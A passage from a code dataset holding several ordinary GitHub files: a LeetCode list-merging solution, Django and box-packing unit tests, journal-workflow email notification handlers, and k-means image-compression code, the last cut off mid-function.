+{"seq_id":"10884447474","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'Jae'\n\nfrom typing import List\n\nfrom hot100.ListNode import ListNode\n\n\n# https://leetcode.com/problems/merge-k-sorted-lists/\nclass MergeKSortedLists:\n\n # 1.优先队列\n # 依次加入优先级队列,每次都取出最小的\n # heapq\n # Runtime: 108 ms, faster than 70.85% of Python3 online submissions for Merge k Sorted Lists.\n # Memory Usage: 17.6 MB, less than 12.12% of Python3 online submissions for Merge k Sorted Lists.\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if lists is None: return None\n import heapq\n head = []\n headNode = ListNode()\n tempNode = ListNode()\n headNode.next = tempNode\n for i in range(len(lists)):\n if lists[i] is None: continue\n heapq.heappush(head, (lists[i].val, i))\n if head is None: return None\n while head:\n val, index = heapq.heappop(head)\n tempNode.next = ListNode(val)\n tempNode = tempNode.next\n if lists[index]:\n lists[index] = lists[index].next\n if lists[index] is not None:\n heapq.heappush(head, (lists[index].val, index))\n return headNode.next.next\n\n # 2.分治,两个两个处理\n def mergeKLists2(self, lists: List[ListNode]) -> ListNode:\n if not lists: return None\n length = len(lists)\n return self.merge(lists, 0, length - 1)\n\n def merge(self, lists, left, right):\n if right == left:\n return lists[left]\n mid = left + (right - left) // 2\n l1 = self.merge(lists, left, mid)\n l2 = self.merge(lists, mid + 1, right)\n return self.mergeTwoLists(l1, l2)\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n if l1 is None:\n return l2\n if l2 is None:\n return l1\n if l1.val <= l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n\n # 3.对值平铺,排序\n def mergeKLists3(self, lists: List[ListNode]) -> ListNode:\n list1 = []\n for i in lists:\n while i:\n list1.append(i.val)\n i = i.next\n list1.sort()\n prev = ListNode()\n res = prev\n for i in list1:\n node = ListNode(i)\n prev.next = node\n prev = node\n return res.next\n\n\nif __name__ == \"__main__\":\n listNode1 = ListNode(1)\n listNode4 = ListNode(4)\n listNode5 = ListNode(5)\n listNode1.next = listNode4\n listNode4.next = listNode5\n\n listNode12 = ListNode(1)\n listNode3 = ListNode(3)\n listNode42 = ListNode(4)\n listNode12.next = listNode3\n listNode3.next = listNode42\n\n listNode2 = ListNode(2)\n listNode6 = ListNode(6)\n listNode2.next = listNode6\n\n check = MergeKSortedLists()\n check.mergeKLists2([listNode1, listNode12, listNode2]).log()\n","repo_name":"dyjae/LeetCodeLearn","sub_path":"python/hot100/23.MergeKSortedLists.py","file_name":"23.MergeKSortedLists.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"11572008969","text":"from http import HTTPStatus\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase, Client\nfrom django.core.cache import cache\n\nfrom ..models import Group, Post\n\n\nUser = get_user_model()\n\n\nclass PostModelTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='auth')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Тестовый пост',\n group=cls.group\n )\n\n def setUp(self):\n cache.clear()\n self.guest_client = Client()\n self.user = User.objects.create_user(username='guest')\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n self.author_post = Client()\n self.author_post.force_login(self.post.author)\n\n def test_pages_all(self):\n post_id = f'/posts/{self.post.id}/'\n url_status = {\n '/': HTTPStatus.OK,\n f'/group/{self.group.slug}/': HTTPStatus.OK,\n f'/profile/{self.post.author}/': HTTPStatus.OK,\n post_id: HTTPStatus.OK,\n 'unexisting_page/': HTTPStatus.NOT_FOUND,\n }\n for address, status in url_status.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address)\n self.assertEqual(response.status_code, status)\n\n def test_pages_registred(self):\n post_id = f'/posts/{self.post.id}/'\n url_status = {\n '/': HTTPStatus.OK,\n f'/group/{self.group.slug}/': HTTPStatus.OK,\n f'/profile/{self.user}/': HTTPStatus.OK,\n post_id: HTTPStatus.OK,\n '/unexisting_page/': HTTPStatus.NOT_FOUND,\n '/create/': HTTPStatus.OK,\n }\n for address, status in url_status.items():\n with self.subTest(address=address):\n response = self.authorized_client.get(address)\n self.assertEqual(response.status_code, status)\n\n def test_edit_page_for_author(self):\n edit_post = f'/posts/{self.post.id}/edit/'\n with self.subTest(address=edit_post):\n response = self.author_post.get(edit_post)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_edit_page_for_authorized_non_author(self):\n edit_post = f'/posts/{self.post.id}/edit/'\n response = self.authorized_client.get(edit_post)\n self.assertRedirects(response, f'/posts/{self.post.id}/')\n\n def test_edit_and_create_page_for_guest(self):\n edit_redir = f'/auth/login/?next=/posts/{self.post.id}/edit/'\n url_redir = {\n f'/posts/{self.post.id}/edit/': edit_redir,\n '/create/': '/auth/login/?next=/create/',\n }\n for address, redir in url_redir.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address, follow=True)\n self.assertRedirects(response, redir)\n","repo_name":"vmikail/hw05_final","sub_path":"yatube/posts/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42669944870","text":"from fulfillment_api.box_packing.helper import (space_after_packing,\n how_many_items_fit, pre_pack_boxes,\n api_packing_algorithm)\nfrom fulfillment_api.errors import BoxError\n\nfrom collections import Counter\nfrom testing.shotput_tests import BaseShotputTestCase\n\n\nclass HowManyItemsFitTest(BaseShotputTestCase):\n def test_exact_fit(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 1,\n 'remaining_volume': 0\n }, response)\n\n def test_five_fit_extra_space(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 3,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 5,\n 'remaining_volume': 4\n }, response)\n\n def test_lots_and_lots(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 1,\n 'width': 1,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 64,\n 'remaining_volume': 0\n }, response)\n\n def test_max_packed(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 1,\n 'width': 1,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info, 8)\n self.assertEqual({\n 'total_packed': 8,\n 'remaining_volume': 56\n }, response)\n\n\nclass SpaceAfterPackingTest(BaseShotputTestCase):\n def test_exact_fit(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n response = space_after_packing(item_info, box_info)\n self.assertEqual({\n 'remaining_volume': 0,\n 'remaining_dimensional_blocks': []\n }, response)\n\n def test_additional_space(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 2,\n 'width': 2,\n 'length': 2\n }\n response = space_after_packing(item_info, box_info)\n self.assertEqual({\n 'remaining_volume': 56,\n 'remaining_dimensional_blocks': [\n {'width': 2, 'height': 2, 'length': 2},\n {'width': 2, 'height': 2, 'length': 4},\n {'width': 2, 'height': 4, 'length': 4}]\n }, response)\n\n\nclass PrePackBoxesTest(BaseShotputTestCase):\n\n def test_pre_pack_boxes_simple(self):\n '''\n tests to make sure we can get a pre-pack of boxes with basic non-db info\n '''\n items_info = [{\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 1,\n 'quantity': 1,\n 'dimension_units': 'inches',\n 'weight_units': 'grams',\n 'product_name': 'TEST_SKU'\n }]\n box_info = {\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 1,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }\n options = {}\n self.assertEqual([{\n 'packed_products': {'TEST_SKU': 1},\n 'total_weight': 2\n }], pre_pack_boxes(box_info, items_info, options))\n\n def test_pre_pack_boxes_too_heavy(self):\n '''\n tests to make sure that when a predefined max weight is provided it\n doesn't over load the boxes\n '''\n items_info = [{\n 'product_name': 'TEST_SKU',\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 3000,\n 'quantity': 4,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }]\n box_info = {\n 'width': 1,\n 'height': 2,\n 'length': 2,\n 'weight': 0,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }\n options = {\n 'max_weight': 8999\n }\n response = pre_pack_boxes(box_info, items_info, 
options)\n self.assertEqual([\n {\n 'packed_products': {'TEST_SKU': 2},\n 'total_weight': 6000\n },\n {\n 'packed_products': {'TEST_SKU': 2},\n 'total_weight': 6000\n }\n ], response)\n\n\nLONG_BOX = {\n 'width': 4,\n 'height': 4,\n 'length': 8,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '4x4x8',\n 'weight': 4\n}\n\nCUBE_BOX = {\n 'width': 4,\n 'height': 4,\n 'length': 4,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '4x4x4',\n 'weight': 4\n}\n\nTOO_SMALL_BOX = {\n 'width': 2,\n 'height': 2,\n 'length': 2,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '2x2x2',\n 'weight': 4\n}\n\nCUBE_SKU = {\n 'width': 4,\n 'height': 4,\n 'length': 4,\n 'product_name': 'TEST',\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'weight': 100\n}\n\n\nclass ApiPackingAlgorithmTest(BaseShotputTestCase):\n\n def setUp(self):\n super(ApiPackingAlgorithmTest, self).setUp()\n self.boxes = {\n '4x4x4': CUBE_BOX,\n '4x4x8': LONG_BOX,\n '2x2x2': TOO_SMALL_BOX\n }\n self.items = {\n '4x4x4': CUBE_SKU\n }\n\n def test_api_packing_algorithm_max_weight(self):\n products = [{\n 'width': 10,\n 'height': 10,\n 'length': 5,\n 'weight': 100,\n 'quantity': 1,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'product_name': 'AG-123'\n }, {\n 'width': 10,\n 'height': 5,\n 'length': 5,\n 'weight': 100,\n 'quantity': 4,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'product_name': 'AG-456'\n }]\n\n result = api_packing_algorithm([{\n 'width': 10,\n 'height': 10,\n 'length': 20,\n 'weight': 50,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'name': 'Box-1'\n }, {\n 'width': 5,\n 'height': 10,\n 'length': 20,\n 'weight': 50,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'name': 'Box-2'\n }], products, {\n 'max_weight': 300\n })\n\n expected_counts = Counter()\n for product in products:\n expected_counts[product['product_name']] += product['quantity']\n\n packed_counts = Counter()\n for package in result['packages']:\n self.assertLessEqual(package['total_weight'], 300)\n\n for item_number, quantity in package['packed_products'].iteritems():\n packed_counts[item_number] += quantity\n\n self.assertEqual(expected_counts, packed_counts)\n\n def test_api_packing_algorithm_simple(self):\n boxes_info = [self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [{\n 'box': self.boxes['4x4x8'],\n 'packed_products': {'TEST': 2},\n 'total_weight': 204.0\n }]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_algorithm_two_boxes(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [{\n 'box': self.boxes['4x4x8'],\n 'packed_products': {'TEST': 2},\n 'total_weight': 204.0\n }]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_algorithm_last_parcel(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 3\n items_info = [item]\n\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [\n {\n 'packed_products': {'TEST': 2},\n 'total_weight': 204,\n 'box': self.boxes['4x4x8']\n },\n {\n 
'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n }\n ]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_too_small(self):\n boxes_info = [self.boxes['2x2x2']]\n item = self.items['4x4x4']\n item['quantity'] = 3\n items_info = [item]\n\n with self.assertRaises(BoxError) as context:\n api_packing_algorithm(boxes_info, items_info, None)\n self.assertEqual('Some of your products are too big for your boxes. '\n 'Please provide larger boxes.',\n context.exception.message)\n\n def test_api_packing_max_weight(self):\n boxes_info = [self.boxes['4x4x8'], self.boxes['4x4x4']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n options = {'max_weight': 200}\n\n expected_return = {\n 'packages': [\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n },\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n }\n ]\n }\n packed_products = api_packing_algorithm(boxes_info, items_info, options)\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_non_unique(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x4']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n\n with self.assertRaises(BoxError) as context:\n api_packing_algorithm(boxes_info, items_info, None)\n self.assertEqual('Please use unique boxes with unique names',\n context.exception.message)\n","repo_name":"shotput/BoxPackingAPI","sub_path":"test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":11257,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"16"}
+{"seq_id":"17278865302","text":"__copyright__ = \"Copyright 2017 Birkbeck, University of London\"\n__author__ = \"Martin Paul Eve & Andy Byers\"\n__license__ = \"AGPL v3\"\n__maintainer__ = \"Birkbeck Centre for Technology and Publishing\"\n\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom utils import (\n notify_helpers,\n models as util_models,\n setting_handler,\n render_template,\n)\nfrom core import models as core_models\nfrom review import logic as review_logic\nfrom review.const import EditorialDecisions as ED\n\n\ndef send_reviewer_withdrawl_notice(**kwargs):\n review_assignment = kwargs['review_assignment']\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0}\\'s review of \"{1}\" has been withdrawn by {2}'.format(review_assignment.reviewer.full_name(),\n review_assignment.article.title,\n request.user.full_name())\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Review Withdrawl',\n 'target': review_assignment.article}\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_review_withdrawl',\n review_assignment.reviewer.email,\n user_message_content,\n log_dict=log_dict\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_editor_unassigned_notice(request, message, assignment, skip=False):\n description = \"{a.editor} unassigned from {a.article} by {r.user}\".format(\n a=assignment,\n r=request,\n )\n\n if not skip:\n\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Editor Unassigned',\n 'target': assignment.article\n }\n\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_unassign_editor',\n assignment.editor.email,\n message,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_editor_assigned_acknowledgements_mandatory(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that an editor has been assigned.\n It is wired up in core/urls.py. 
It is different to the below function in that this is called when an editor is\n assigned, whereas the below is only called when the user opts to send a message to the editor.\n :param kwargs: a list of kwargs that includes editor_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n\n editor_assignment = kwargs['editor_assignment']\n article = editor_assignment.article\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n acknowledgement = kwargs['acknowledgement']\n\n description = '{0} was assigned as the editor for \"{1}\"'.format(editor_assignment.editor.full_name(),\n article.title)\n\n context = {\n 'article': article,\n 'request': request,\n 'editor_assignment': editor_assignment\n }\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Editor Assignment',\n 'target': article}\n\n # send to assigned editor\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_editor_assignment',\n editor_assignment.editor.email,\n user_message_content,\n log_dict=log_dict\n )\n\n # send to editor\n if not acknowledgement:\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_setting_template(request, 'editor_assignment',\n 'subject_editor_assignment',\n request.user.email, context,\n log_dict=log_dict)\n\n\ndef send_editor_assigned_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that an editor has been assigned.\n It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes editor_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n kwargs['acknowledgement'] = True\n\n send_editor_assigned_acknowledgements_mandatory(**kwargs)\n\n\ndef send_reviewer_requested_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has been requested.\n It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = 'A review request was added to \"{0}\" for user {1}'.format(\n article.title,\n review_assignment.reviewer.full_name(),\n )\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Review Request',\n 'target': article}\n\n # send to requested reviewer\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_review_assignment',\n review_assignment.reviewer.email,\n user_message_content,\n log_dict=log_dict,\n )\n\n # send slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_review_complete_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has completed his or her\n review. 
It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, and request\n :return: None\n \"\"\"\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n request.user = review_assignment.reviewer\n\n description = '{0} completed the review of \"{1}\": {2}'.format(\n review_assignment.reviewer.full_name(),\n article.title,\n review_assignment.get_decision_display(),\n )\n\n util_models.LogEntry.add_entry(\n types='Review Complete',\n description=description,\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n review_in_review_url = request.journal.site_url(\n path=reverse(\n 'review_in_review',\n kwargs={'article_id': article.pk},\n )\n )\n\n context = {\n 'article': article,\n 'request': request,\n 'review_assignment': review_assignment,\n }\n\n # send slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # send to reviewer\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_complete_reviewer_acknowledgement',\n 'subject_review_complete_reviewer_acknowledgement',\n review_assignment.reviewer.email,\n context,\n )\n\n # send to editor\n context['review_in_review_url'] = review_in_review_url\n editors = get_assignment_editors(review_assignment)\n for editor in editors:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_complete_acknowledgement',\n 'subject_review_complete_acknowledgement',\n editor.email,\n context,\n )\n\n\ndef send_reviewer_accepted_or_decline_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has either accepted or\n declined to review. It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, accepted and request\n :return: None\n \"\"\"\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n accepted = kwargs['accepted']\n\n description = '{0} {1} to review {2}'.format(\n review_assignment.reviewer.full_name(),\n ('accepted' if accepted else 'declined'),\n article.title,\n )\n\n util_models.LogEntry.add_entry(\n types='Review request {0}'.format(('accepted' if accepted else 'declined')),\n description=description,\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n review_url = review_logic.get_review_url(\n request,\n review_assignment,\n )\n\n review_in_review_url = request.journal.site_url(\n path=reverse(\n 'review_in_review',\n kwargs={'article_id': article.pk},\n )\n )\n\n context = {\n 'article': article,\n 'request': request,\n 'review_assignment': review_assignment,\n }\n\n reviewer_context = context\n reviewer_context['review_url'] = review_url\n editor_context = context\n editor_context['review_in_review_url'] = review_in_review_url\n\n # send to slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # send to reviewer\n if accepted:\n context[\"reviewer_decision\"] = _(\"accepted\")\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_accept_acknowledgement',\n 'subject_review_accept_acknowledgement',\n review_assignment.reviewer.email,\n reviewer_context,\n )\n\n else:\n context[\"reviewer_decision\"] = _(\"declined\")\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_decline_acknowledgement',\n 'subject_review_decline_acknowledgement',\n 
review_assignment.reviewer.email,\n reviewer_context,\n )\n\n # send to editor\n editors = get_assignment_editors(review_assignment)\n for editor in editors:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'reviewer_acknowledgement',\n 'subject_reviewer_acknowledgement',\n editor.email,\n editor_context,\n )\n\n\ndef send_submission_acknowledgement(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it\n notifies site operators of a submission. It is\n wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes article and request\n :return: None\n \"\"\"\n\n article = kwargs['article']\n request = kwargs['request']\n\n util_models.LogEntry.add_entry(\n types='Submission Complete',\n description='A new article {0} was submitted'.format(article.title),\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': 'A new article {0} was submitted'.format(article.title),\n 'types': 'New Submission Acknowledgement',\n 'target': article,\n }\n\n # generate URL\n review_unassigned_article_url = request.journal.site_url(\n path=reverse(\n 'review_unassigned_article',\n kwargs={'article_id': article.pk},\n )\n )\n notify_helpers.send_slack(\n request,\n 'New submission: {0} {1}'.format(\n article.title,\n review_unassigned_article_url,\n ),\n ['slack_editors'])\n\n # send to author\n context = {\n 'article': article,\n 'request': request,\n 'review_unassigned_article_url': review_unassigned_article_url,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'submission_acknowledgement',\n 'subject_submission_acknowledgement',\n article.correspondence_author.email,\n context,\n log_dict=log_dict,\n )\n\n # send to all editors\n editors_to_email = setting_handler.get_setting(\n 'general', 'editors_for_notification', request.journal).processed_value\n\n if editors_to_email:\n editor_pks = [int(pk) for pk in editors_to_email]\n editor_emails = {\n role.user.email for role in core_models.AccountRole.objects.filter(\n role__slug='editor',\n user__id__in=editor_pks,\n )\n }\n else:\n editor_emails = set(request.journal.editor_emails)\n\n assigned_to_section = (\n article.section.editors.all() | article.section.section_editors.all())\n\n editor_emails |= {editor.email for editor in assigned_to_section}\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'editor_new_submission',\n 'subject_editor_new_submission',\n editor_emails,\n context,\n log_dict=log_dict,\n custom_reply_to=[f\"noreply{settings.DUMMY_EMAIL_DOMAIN}\"]\n )\n\n\ndef send_article_decision(**kwargs):\n article = kwargs['article']\n request = kwargs['request']\n decision = kwargs['decision']\n subject = \"\"\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0}\\'s article \"{1}\" has been {2}ed by {3}'.format(article.correspondence_author.full_name(),\n article.title,\n decision,\n request.user.full_name())\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Article Decision',\n 'target': article}\n\n if decision == ED.ACCEPT.value:\n subject = 'subject_review_decision_accept'\n elif decision == ED.DECLINE.value:\n subject = 'subject_review_decision_decline'\n elif decision == ED.UNDECLINE.value:\n subject = 'subject_review_decision_undecline'\n\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 
subject,\n article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_revisions_request(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0} has requested revisions for {1} due on {2}'.format(\n request.user.full_name(),\n revision.article.title,\n revision.date_due,\n )\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Revision Request',\n 'target': revision.article,\n }\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_request_revisions',\n revision.article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(\n request,\n description,\n ['slack_editors'],\n )\n\n\ndef send_revisions_complete(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n\n action_text = ''\n for action in revision.actions.all():\n action_text = \"{0}
\n\n# In[4]:\n\n\ndef init_centroids(a,k):\n centroids = np.zeros((np.shape(a)[0],k))\n for i in range(0,k):\n num = np.random.randint(0,np.shape(a)[1])\n centroids[:,i] = a[:,num]\n centroids[4,i] = i\n a[4,num] = i\n return centroids\n\n\n# #
 Compute new centroids
\n\n# In[5]:\n\n\ndef new_centroids(a,k):\n new_centroids = np.zeros((np.shape(a)[0],k))\n for i in range(0,k):\n new_centroids[:,i] = np.mean(a[:,a[4,:]==i],axis = 1)\n print(np.shape(new_centroids))\n return new_centroids\n\n\n# #
Compute distance to centroids & assign labels
\n\n# In[6]:\n\n\nfrom scipy.spatial.distance import cdist as cd\n\ndef distance(a,centroids):\n index2 = np.shape(centroids)[1]\n temp = np.zeros((1,index2))\n print(np.shape(a))\n for i in range(0,np.shape(a)[1]):\n temp = cd([a[0:4,i].transpose()],centroids[0:4,:].transpose(),metric = 'euclidean')\n closest_centroid = np.argmin(temp)\n temp2 = centroids[:,closest_centroid]\n a[:,i] = temp2\n return a\n\n\n# In[7]:\n\n\nnum_centroids = 24\nX_temp = np.zeros((5,409960))\ncentroids = init_centroids(X,num_centroids)\nX_temp = distance(X,centroids)\nfor i in range(0,1):\n centroids_new = new_centroids(X_temp,num_centroids)\n centroids = centroids_new\n X_temp = distance(X_temp,centroids)\n \n\n\n# In[8]:\n\n\nimport scipy.misc\n\nr = X_temp[0,:]\ng = X_temp[1,:]\nb = X_temp[2,:]\nr = r.reshape(740,554)\ng = g.reshape(740,554)\nb = b.reshape(740,554)\nrgb = np.dstack((r*255,g*255,b*255))\n\nscipy.misc.imsave('rgb.jpg',rgb)\nimage = Image.open('rgb.jpg')\nimgplot = plt.imshow(image)\nplt.show()\n\n","repo_name":"shubham2604/MachineLearning","sub_path":"Python_codes/Image_compression_using_k_means.py","file_name":"Image_compression_using_k_means.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
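The notebook record above quantizes the photo to num_centroids = 24 colours with a hand-written assignment/update loop. For comparison, the same quantization can be expressed with scikit-learn's KMeans; this is an illustrative sketch rather than the notebook's own code, and the random array stands in for the loaded 740x554 image.

import numpy as np
from sklearn.cluster import KMeans

image = np.random.rand(740, 554, 3)        # placeholder for the loaded photo
pixels = image.reshape(-1, 3)              # one row per pixel (R, G, B)

kmeans = KMeans(n_clusters=24, n_init=10, random_state=0).fit(pixels)
quantized = kmeans.cluster_centers_[kmeans.labels_]   # replace each pixel by its centroid colour
compressed = quantized.reshape(image.shape)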
+{"seq_id":"93316100","text":"import Statics\nimport random as ran\n\nclass kmeans():\n def __init__(self, initializationMethod):\n self.initializationMethod = initializationMethod\n\n def main(self, k):\n assignedCluster = []\n newCentroids = []\n\n # Calculate initial centroids\n if self.initializationMethod == \"plus\":\n initialCentroids = self.initializePlus(k)\n elif self.initializationMethod == \"normal\":\n initialCentroids = self.initializeClusters(k)\n elif self.initializationMethod == \"spread\":\n initialCentroids = self.initializeSpread(k)\n\n # adjust centroids by iteration, stop when finished or max iterations\n for num in range(0, Statics.maxIterations):\n #TODO: how to copy elements?\n assignedCluster [:] = [] #delete values in list\n assignedCluster [:] = self.assign_Centroid(initialCentroids, k)\n newCentroids [:] = [] #delete values in list\n newCentroids [:] = self.recalculate_Centroids(assignedCluster, k)\n # recognizing natural finish point\n if initialCentroids == newCentroids:\n break;\n\n if num==Statics.maxIterations:\n assignedCluster [:] = self.assign_Centroid(newCentroids, k)\n\n initialCentroids [:] = list(newCentroids)\n\n return newCentroids, assignedCluster\n\n\n # initializes k centroids\n # picks random data points as initial centroids\n def initializeClusters(self, k):\n centroids = [];\n for cluster in range(0, k):\n ch = ran.choice(Statics.data)\n centroids.append(ch)\n return centroids\n\n def initializePlus(self, k):\n centroids = [];\n centroids.append(ran.choice(Statics.data))\n\n for cluster in range(1, k):\n # Calculate distance to nearest centroid for each data point\n minDistances = [] # Holds the distances to the nearest centroid for 